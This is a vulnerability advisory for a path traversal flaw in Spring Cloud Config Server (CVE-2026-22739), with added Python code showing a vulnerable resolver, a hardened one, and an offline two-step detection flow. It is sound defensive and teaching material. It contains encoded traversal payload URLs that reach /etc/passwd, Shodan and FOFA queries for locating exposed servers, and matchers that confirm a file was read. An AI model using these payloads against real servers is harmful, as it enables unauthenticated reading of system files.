CVE-2026-22739
published 2026-03-24

CVE-2026-22739: Vulnerability in Spring Cloud when substituting the profile parameter from a request made to the Spring Cloud Config Server configured to the native file…

Priority: P2 (65) · Severity: high · CVSS 3.1 base score: 8.6
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
Exploit likelihood (EPSS): 1.22% (64.9th percentile)
Vulnerability in Spring Cloud when substituting the profile parameter from a request made to the Spring Cloud Config Server configured to the native file system as a backend, because it was possible to access files outside of the configured search directories. This issue affects Spring Cloud: from 3.1.X before 3.1.13, from 4.1.X before 4.1.9, from 4.2.X before 4.2.3, from 4.3.X before 4.3.2, from 5.0.X before 5.0.2.
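The following is an added illustration of the bug class, not Spring Cloud Config Server's own code: a client-controlled profile value is substituted into a native (file-system) search location, so dot-dot segments walk out of the search root, and a containment check plus an allow-list on the profile segment closes the hole. The search root /srv/config, the {profile} placeholder layout, the allow-list regex and the sample requests are assumptions made for this example.

```python
"""
Added illustration, not Spring Cloud Config Server's own code: what goes wrong
when a client-controlled `profile` value is substituted into a native
(file-system) search location, and the containment check that closes the hole.
The search root, the `{profile}` placeholder layout and the allow-list regex
are assumptions made for this example.
"""
import posixpath
import re
from pathlib import PurePosixPath

SEARCH_ROOT = PurePosixPath("/srv/config")          # assumed native search directory
SEARCH_LOCATIONS = [                                 # assumed placeholder layout
    "{root}/{profile}",
    "{root}/{application}-{profile}",
]
PROFILE_RE = re.compile(r"[A-Za-z0-9_-]+")          # assumed allow-list for one profile segment


def _candidates(application: str, profile: str):
    """Expand the placeholders for each comma-separated profile, as the request allows."""
    for segment in profile.split(","):
        for location in SEARCH_LOCATIONS:
            raw = location.format(root=str(SEARCH_ROOT), application=application, profile=segment)
            yield segment, posixpath.normpath(raw)


def vulnerable_resolve(application: str, profile: str) -> list:
    """Naive substitution: '..' in the profile walks out of SEARCH_ROOT unnoticed."""
    return [path for _, path in _candidates(application, profile)]


def safe_resolve(application: str, profile: str) -> list:
    """Hardened: reject any segment that fails the allow-list, then re-check that
    the normalised path is still inside SEARCH_ROOT (defence in depth; on a real
    file system repeat the containment check against os.path.realpath())."""
    resolved = []
    for segment, path in _candidates(application, profile):
        if not PROFILE_RE.fullmatch(segment):
            # catches '..', '/', and encoded residue such as '..%2F' that survives one decode
            raise ValueError(f"rejected profile segment {segment!r}")
        if not PurePosixPath(path).is_relative_to(SEARCH_ROOT):
            raise ValueError(f"{path} escapes {SEARCH_ROOT}")
        resolved.append(path)
    return resolved


def is_rejected(application: str, profile: str) -> bool:
    """True when the hardened resolver refuses the request."""
    try:
        safe_resolve(application, profile)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed requests: a normal profile and the traversal shapes a scanner would send
    for prof in ("default", "../../../../../etc", "default,../../../../../etc"):
        print(prof, "->", vulnerable_resolve("application", prof),
              "| rejected by hardened resolver:", is_rejected("application", prof))
```

The comma-separated case matters because a request can carry several profiles at once: a legitimate first segment does not make the second one safe, so every segment is checked on its own. The allow-list also stops the double-encoded variant, since ..%252F decodes once to ..%2F and the percent sign fails the regex.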

Affected (5 ranges)

Vendor   Product        Version range          Fixed in
spring   spring_cloud   >= 3.1.x, < 3.1.13     3.1.13
spring   spring_cloud   >= 4.1.x, < 4.1.9      4.1.9
spring   spring_cloud   >= 4.2.x, < 4.2.3      4.2.3
spring   spring_cloud   >= 4.3.x, < 4.3.2      4.3.2
spring   spring_cloud   >= 5.0.x, < 5.0.2      5.0.2

Detection & IOCs (extracted from sources)

url: {{BaseURL}}/application/..%2F..%2F..%2F..%2F..%2Fetc
url: {{BaseURL}}/application/..%2F..%2F..%2F..%2F..%2Fetc/main
url: {{BaseURL}}/application/..%252F..%252F..%252F..%252F..%252Fetc
url: {{BaseURL}}/application/default%2C..%2F..%2F..%2F..%2F..%2Fetc
other: shodan-query: http.html:"propertySources"
other: fofa-query: body="propertySources" && body="profiles" && body="label"
  • Probe for Spring Cloud Config Server exposure by checking that 'propertySources', '"profiles"' and '"label"' are all present in the response body of GET /application/default
  • Path traversal payloads use URL-encoded and double-URL-encoded dot-dot-slash sequences in the profile parameter (..%2F, ..%252F) and comma-separated profile injection (default%2C..%2F...), all walking up to /etc on the server
  • Successful exploitation is confirmed when the response is HTTP 200 with Content-Type application/json and the body matches 'root:.*:0:0' or '"root":"x:0:0:' (the second form is an /etc/passwd line after key/value parsing, with the first colon as the separator)
  • The vulnerability is in the profile parameter substitution path of Spring Cloud Config Server when using the native file system backend (CWE-22 path traversal)
  • Affected Maven artifact is org.springframework.cloud:spring-cloud-config-server; scan Java build manifests for this dependency
  • Only Spring Cloud Config Server instances configured with the native file system backend are affected; other backends (e.g. Git) are not
  • Exploitation needs only a crafted HTTP request; unauthenticated remote exploitation is possible (CVSS AV:N/AC:L/PR:N/UI:N)
  • The Nuclei template uses a two-step flow: step 1 confirms the target is a Spring Cloud Config Server, step 2 fires the traversal payloads, which reduces but does not eliminate false positives
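The two-step detection flow described above, as an added example that is not the Nuclei template or any code from the page: the payload URLs are rebuilt from the IOC list for an arbitrary base URL, the fingerprint and confirmation matchers are applied to HTTP responses, and the whole flow is run over constructed responses so it executes offline. The response bodies are made up for the example in the shape the notes describe; they are not captured traffic, and the hostname config.example is a placeholder.

```python
"""
Added example, not the Nuclei template or any code from the page: the two-step
detection flow from the notes above, run over constructed HTTP responses so it
executes offline. The response bodies below are made up for the example; they
follow the shape the notes describe, not captured traffic.
"""
import re

FINGERPRINT_MARKERS = ("propertySources", '"profiles"', '"label"')
# passwd either as raw text or as JSON key/value once parsed as properties
PASSWD_RE = re.compile(r'root:.*:0:0|"root":"x:0:0:')


def traversal_urls(base_url: str, depth: int = 5, target: str = "etc") -> list:
    """Build the four payload URLs from the IOC list for an arbitrary base URL."""
    single = "..%2F" * depth      # URL-encoded ../
    double = "..%252F" * depth    # double-encoded ../ (survives one decode as ..%2F)
    return [
        f"{base_url}/application/{single}{target}",
        f"{base_url}/application/{single}{target}/main",
        f"{base_url}/application/{double}{target}",
        f"{base_url}/application/default%2C{single}{target}",
    ]


def looks_like_config_server(body: str) -> bool:
    """Step 1: all three markers must appear in the GET /application/default body."""
    return all(m in body for m in FINGERPRINT_MARKERS)


def confirms_traversal(status: int, content_type: str, body: str) -> bool:
    """Step 2: HTTP 200, JSON content type and a passwd-shaped root entry."""
    return (status == 200
            and content_type.split(";")[0].strip() == "application/json"
            and PASSWD_RE.search(body) is not None)


def assess(fingerprint: dict, payload_responses: list) -> str:
    """Run the flow over one fingerprint response and the payload responses."""
    if not looks_like_config_server(fingerprint["body"]):
        return "not-a-config-server"
    for r in payload_responses:
        if confirms_traversal(r["status"], r["content_type"], r["body"]):
            return "vulnerable"
    return "config-server-not-confirmed"


# Constructed responses (not real captures)
FINGERPRINT_OK = {"status": 200, "content_type": "application/json",
                  "body": '{"name":"application","profiles":["default"],"label":null,'
                          '"version":null,"state":null,"propertySources":[]}'}
PAYLOAD_HIT = {"status": 200, "content_type": "application/json",
               "body": '{"name":"application","profiles":["../../../../../etc"],"label":null,'
                       '"propertySources":[{"name":"file:/etc/passwd",'
                       '"source":{"root":"x:0:0:root:/root:/bin/bash"}}]}'}
PAYLOAD_MISS = {"status": 404, "content_type": "application/json", "body": '{"error":"Not Found"}'}
NOT_CONFIG = {"status": 200, "content_type": "text/html", "body": "<html>propertySources</html>"}

if __name__ == "__main__":
    for u in traversal_urls("http://config.example"):
        print(u)
    print(assess(FINGERPRINT_OK, [PAYLOAD_MISS, PAYLOAD_HIT]))
```

The confirmation regex is deliberately loose ('root:.*:0:0' will match any JSON that happens to echo a colon-separated value containing root), which is why the fingerprint step comes first; a hit should still be verified by hand, for instance by requesting a second file with a known, distinctive first line, before it is reported as confirmed.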